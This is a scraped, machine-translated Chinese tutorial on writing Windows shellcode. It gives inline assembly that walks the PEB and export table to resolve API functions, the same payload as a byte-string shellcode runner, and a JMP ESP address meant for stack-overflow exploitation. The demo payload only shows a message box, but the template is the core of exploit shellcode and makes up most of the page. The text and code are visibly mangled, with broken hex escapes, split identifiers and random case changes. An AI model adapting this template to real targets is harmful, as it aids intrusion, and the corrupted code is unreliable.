Home > Others

Making cross-platform Shellcode

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Using the JMP ESP principle there are many such directives in Windows
Find one with DBG first.

Then turn the shellcode into opcode can be tested first (code and opcode at the end)


Get some more 90 90 because some of the functions have several parameters

Run 

ConsoleApplication2.cpp: Defines the entry point of the console application.        #include "stdafx.h" int _tmain (int argc, _tchar* argv[]) {__asm {Pushad;        Sub ESP, 0x100;        JMP Tag_shellcode; [tag_next-0x52] "GetProcAddress" _asm _emit (0x47) _asm _emit (0x65) _asm _emit (0x74) _asm _emit (0x50) _asm _emit (0x72) _asm _emit (0x6f) _asm _emit (0x63) _asm _emit (0x41) _asm _emit (0x64) _asm _emit (0x64) _asm _emit (0x72) _        ASM _emit (0X65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x00)//[tag_next-0x44] "Loadlibraryexa\0" _asm _emit (0x4c) _asm _emit (0x6f) _asm _emit (0x61) _asm _emit (0x64) _asm _emit (0x4c) _asm _emit (0x69) _asm _emit  (0x62) _asm _emit (0x72) _asm _emit (0x61) _asm _emit (0x72) _asm _emit (0x79) _asm _emit (0x45) _asm _emit (0x78) _asm _emit (0x41) _asm _emit (0x00)//[tag_next-0x35] "User32.dll\0" _asm _emit (0x55) _asm _emit (0x73) _asm _emit (0x65) _asm _emit (0x72) _asm _emit (0x33) _asm _emit (0x32) _asm _emit (0x2e) _asm _emit (0x64) _asm _emit (0x6c) _asm _emit (0x6c) _asm _emit (0x00)//[tag_next-0x2a] "Messageboxa\0" _asm _emit (0x4d) _asm _emit (0x65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x61) _asm _emit (0x67) _asm _em It (0x65) _asm _emit (0x42) _asm _emit (0x6f) _asm _emit (0x78) _asm _emit (0x41) _asm _emit (0x00)//[tag_next-0x 1E] "exitprocess\0" _asm _emit (0x45) _asm _emit (0x78) _asm _emit (0x69) _asm _emit (0x74) _asm _emit (0x50) _a SM _emit (0x72) _asm _emit (0x6f) _asm _emit (0x63) _asm _emit (0x65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x00        )//[tag_next-0x12] "Hello world!\0" _asm _emit (0x48) _asm _emit (0x65) _asm _emit (0x6c) _asm _emit (0x6c) _asm _emit (0x6f) _asm _emit (0x20) _asm _emit (0x57) _asm _emit (0x6f) _asm _emit (0x72) _asm _emit (0x6c) _asm _em                 It (0x64) _asm _emit (0x21) _asm _emit (0x00) Tag_shellcode:call tag_next;              Tag_next:       Pop ebx;                     Get critical module Base address mov esi, DWORD ptr fs: [0x30];                     mov esi, [esi + 0x0c];                     mov esi, [esi + 0x1c];                     mov esi, [esi];                     mov edx, [esi + 0x08];                     Gets the function address of the GetProcAddress push ebx;                     Push edx;                     Call fun_getprocaddress;                     mov esi, eax;                     Gets the function address of the loadlibraryexa push edx;                     Lea ECX, [ebx-0x44];                     push ecx;                     Push edx;                     call eax;                     Pop edx;                     Call payload partial push ebx;                     Push ESI;                     push eax;                     Push edx;                 Call Fun_payload;                     Fun_getprocaddress:push EBP;                     MOV ebp, esp; Sub ESP, 0x0c;                     Push edx;                     Get the address of eat, ENT and EOT mov edx, [ebp + 0x08];                     mov esi, [edx + 0x3c];                     Lea ESI, [edx + esi];                     mov esi, [esi + 0x78];                     Lea ESI, [edx + esi];                     mov edi, [esi + 0x1c];                     Lea EDI, [edx + edi];                     MOV[EBP-0X04], EDI;                     mov edi, [esi + 0x20];                     Lea EDI, [edx + edi];                     MOV[EBP-0X08], EDI;                     mov edi, [esi + 0x24];                     Lea EDI, [edx + edi];                     MOV[EBP-0X0C], EDI;                     The cycle compares the function name in ENT with the XOR eax, eax;                 JMP tag_firstcmp;                 Tag_cmpfunnameloop:inc eax;                     Tag_firstcmp:mov esi, [ebp-0x08];                     mov esi, [esi + 4 * EAX]; mov edx, [Ebp +0X08];                     Lea ESI, [edx + esi];                     mov ebx, [ebp + 0x0c];                     Lea EDI, [ebx-0x53];                     mov ecx, 0x0e;                     Cld                     Repe CMPSB;                     Jne Tag_cmpfunnameloop;                     Successful after finding the corresponding serial number mov esi, [ebp-0x0c];                     XOR EDI, EDI;                     mov di, [esi + eax * 2];                     Use the ordinal as the index, find the function address corresponding to the functions of the name mov edx, [ebp-0x04];                     mov esi, [edx + EDI * 4];                     mov edx, [ebp + 0x08];                     Returns the key function that gets to the address of Lea EAX, [edx + esi];                     Pop edx;                     mov esp, EBP;                     Pop ebp;                 RETN 0x08;                     Fun_payload:push EBP;                     MOV ebp, esp;                     Sub ESP, 0x08;                     mov ebx, [ebp + 0x14]; Get MeSsageboxa function Address Lea ecx, [ebx-0x35];                     Push 0;                     Push 0;                     push ecx;                     CALL[EBP + 0x0c];                     Lea ECX, [ebx-0x2a];                     push ecx;                     push eax;                     CALL[EBP + 0x10];                     MOV[EBP-0X04], eax;                     Get the function address of ExitProcess lea ECX, [ebx-0x1e];                     push ecx;                     PUSH[EBP + 0x08];                     CALL[EBP + 0x10];                     MOV[EBP-0X08], eax;                     Show Lea ECX, [ebx-0x12];                     Push 0;                     push ecx;                     push ecx;                     Push 0;                     CALL[EBP-0X04];                     Push 0;                     CALL[EBP-0X08];                     mov esp, EBP;                     Pop ebp;    RETN 0x10; } return 0;}
#include "stdafx.h" int _tmain (int argc, _tchar* argv[]) {char bshellcode[] = {"\x60\x81\xec\x00\x01\x00\x00\xeb\x4e\x4 7\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x45\x78\ X41\x00\x55\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\x45\x78\ X69\x74\x50\x72\x6f\x63\x65\x73\x73\x00\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x00\xe8\x00\x00\x00\ X00\x5b\x64\x8b\x35\x30\x00\x00\x00\x8b\x76\x0c\x8b\x76\x1c\x8b\x36\x8b\x56\x08\x53\x52\xe8\x14\x00\x00\x00\ X8b\xf0\x52\x8d\x4b\xbc\x51\x52\xff\xd0\x5a\x53\x56\x50\x52\xe8\x6e\x00\x00\x00\x55\x8b\xec\x83\xec\x0c\x52\ X8b\x55\x08\x8b\x72\x3c\x8d\x34\x32\x8b\x76\x78\x8d\x34\x32\x8b\x7e\x1c\x8d\x3c\x3a\x89\x7d\xfc\x8b\x7e\x20\ X8d\x3c\x3a\x89\x7d\xf8\x8b\x7e\x24\x8d\x3c\x3a\x89\x7d\xf4\x33\xc0\xeb\x01\x40\x8b\x75\xf8\x8b\x34\x86\x8b\ X55\x08\x8d\x34\x32\x8b\x5d\x0c\x8d\x7b\xad\xb9\x0e\x00\x00\x00\xfc\xf3\xa6\x75\xe3\x8b\x75\xf4\x33\xff\x66\ X8b\x3c\x46\X8b\x55\xfc\x8b\x34\xba\x8b\x55\x08\x8d\x04\x32\x5a\x8b\xe5\x5d\xc2\x08\x00\x55\x8b\xec\x83\xec\x08\x8b\x5d\ X14\x8d\x4b\xcb\x6a\x00\x6a\x00\x51\xff\x55\x0c\x8d\x4b\xd6\x51\x50\xff\x55\x10\x89\x45\xfc\x8d\x4b\xe2\x51\ Xff\x75\x08\xff\x55\x10\x89\x45\xf8\x8d\x4b\xee\x6a\x00\x51\x51\x6a\x00\xff\x55\xfc\x6a\x00\xff\x55\xf8\x8b\    Xe5\x5d\xc2 "};        __asm {lea eax, Bshellcode;        push eax; RET} return 0;}
"\x60\x81\xec\x00\x01\x00\x00\xeb\x4e\x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4c\x6f\x61\ X64\x4c\x69\x62\x72\x61\x72\x79\x45\x78\x41\x00\x55\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x4d\x65\x73\x73\ X61\x67\x65\x42\x6f\x78\x41\x00\x45\x78\x69\x74\x50\x72\x6f\x63\x65\x73\x73\x00\x48\x65\x6c\x6c\x6f\x20\x57\ X6f\x72\x6c\x64\x21\x00\xe8\x00\x00\x00\x00\x5b\x64\x8b\x35\x30\x00\x00\x00\x8b\x76\x0c\x8b\x76\x1c\x8b\x36\ X8b\x56\x08\x53\x52\xe8\x14\x00\x00\x00\x8b\xf0\x52\x8d\x4b\xbc\x51\x52\xff\xd0\x5a\x53\x56\x50\x52\xe8\x6e\ X00\x00\x00\x55\x8b\xec\x83\xec\x0c\x52\x8b\x55\x08\x8b\x72\x3c\x8d\x34\x32\x8b\x76\x78\x8d\x34\x32\x8b\x7e\ X1c\x8d\x3c\x3a\x89\x7d\xfc\x8b\x7e\x20\x8d\x3c\x3a\x89\x7d\xf8\x8b\x7e\x24\x8d\x3c\x3a\x89\x7d\xf4\x33\xc0\ Xeb\x01\x40\x8b\x75\xf8\x8b\x34\x86\x8b\x55\x08\x8d\x34\x32\x8b\x5d\x0c\x8d\x7b\xad\xb9\x0e\x00\x00\x00\xfc\ Xf3\xa6\x75\xe3\x8b\x75\xf4\x33\xff\x66\x8b\x3c\x46\x8b\x55\xfc\x8b\x34\xba\x8b\x55\x08\x8d\x04\x32\x5a\x8b\ xe5\x5d\xc2\x08\x00\x55\x8B\xec\x83\xec\x08\x8b\x5d\x14\x8d\x4b\xcb\x6a\x00\x6a\x00\x51\xff\x55\x0c\x8d\x4b\xd6\x51\x50\xff\x55\x10\x89\ X45\xfc\x8d\x4b\xe2\x51\xff\x75\x08\xff\x55\x10\x89\x45\xf8\x8d\x4b\xee\x6a\x00\x51\x51\x6a\x00\xff\x55\xfc\  X6a\x00\xff\x55\xf8\x8b\xe5\x5d\xc2 "77460a9b jmp ESP Address {0x60, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00, 0xEB, 0x4E, 0x47, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x63,0x41, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x00, 0x4C, 0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x 72,0x61, 0x72, 0x79, 0x45, 0x78, 0x41, 0x00, 0x55, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c,0x6c, 0x00, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x42, 0x6F, 0x78, 0x41, 0x00, 0x45, 0x78,0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x7 3, 0x00, 0x48, 0x65, 0x6c, 0x6c, 0x6F, 0x20,0x57, 0x6F, 0x72, 0x6c, 0x64, 0x21, 0x00, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x64, 0x8b, 0x35,0x30, 0x00, 0x00, 0x00, 0x8b, 0x76, 0x0C, 0x8b, 0x76, 0x1C, 0x8b, 0x36, 0x8b, 0x56, 0x08, 0x53,0x52, 0xe8 , 0x14, 0x00, 0x00, 0x00, 0x8b, 0xF0, 0x52, 0x8d,0x4B, 0xBC, 0x51, 0x52, 0xFF, 0xd0,0x5a, 0x53, 0x56, 0x50, 0x52, 0xe8, 0x6e, 0x00, 0x00, 0x00, 0x55, 0x8b, 0xEC, 0x83, 0xE C, 0x0c,0x52, 0x8b, 0x55, 0x08, 0x8b, 0x72, 0x3C, 0x8d, 0x34, 0x32, 0x8b, 0x76, 0x78, 0x8d, 0x34, 0x32,0x8b, 0x7E, 0x1C, 0 x8d, 0x3C, 0x3A, 0x89, 0x7d, 0xFC, 0x8b, 0x7E, 0x20, 0x8d, 0x3C, 0x3A, 0x89,0x7d, 0xF8, 0x8b, 0x7E, 0x24, 0x8d, 0x3C, 0x3A , 0x89, 0x7d, 0xf4, 0x33, 0xC0, 0xEB, 0x01, 0x40,0x8b, 0x75, 0xF8, 0x8b, 0x34, 0x86, 0x8b, 0x55, 0x08, 0x8d, 0x34, 0x32, 0  x8b, 0x5d, 0x0C, 0x8d,0x7b, 0xAD, 0xb9, 0x0E, 0x00, 0x00, 0x00, 0xFC, 0xf3, 0xa6, 0x75, 0xe3, 0x8b, 0x75, 0xf4, 0x33,0xff, 0x66, 0x8b, 0x3C, 0x46, 0x8b, 0x55, 0xFC, 0x8b, 0x34, 0xBA, 0x8b, 0x55, 0x08, 0x8d, 0x04,0x32, 0x5A, 0x8b, 0xe5, 0x5d, 0x  C2, 0x08, 0x00, 0x55, 0x8b, 0xEC, 0x83, 0xEC, 0x08, 0x8b, 0x5d,0x14, 0x8d, 0x4B, 0xCB, 0x6A, 0x00, 0x6A, 0x00, 0x51, 0xFF, 0x55, 0x0C, 0x8d, 0x4B, 0xd6, 0x51,0x50, 0xFF, 0x55, 0x10, 0x89, 0x45, 0xFC, 0x8d, 0x4B, 0xe2, 0x51, 0xFF, 0x75, 0x08, 0x FF, 0x55,0x10, 0x89, 0x45, 0xF8, 0x8d, 0x4B, 0xEE, 0x6A, 0x00, 0x51, 0x51, 0x6A, 0x00, 0xFF, 0x55, 0xfc,0x6a, 0x00, 0xFF, 0x55, 0xF8, 0x8b, 0xe5, 0X5D, 0xC2};

Making cross-platform Shellcode

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
cross platform mmorpg cross platform retargeting cross platform games pubg cross platform cross platform phone games cross platform application framework cross platform development ide

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More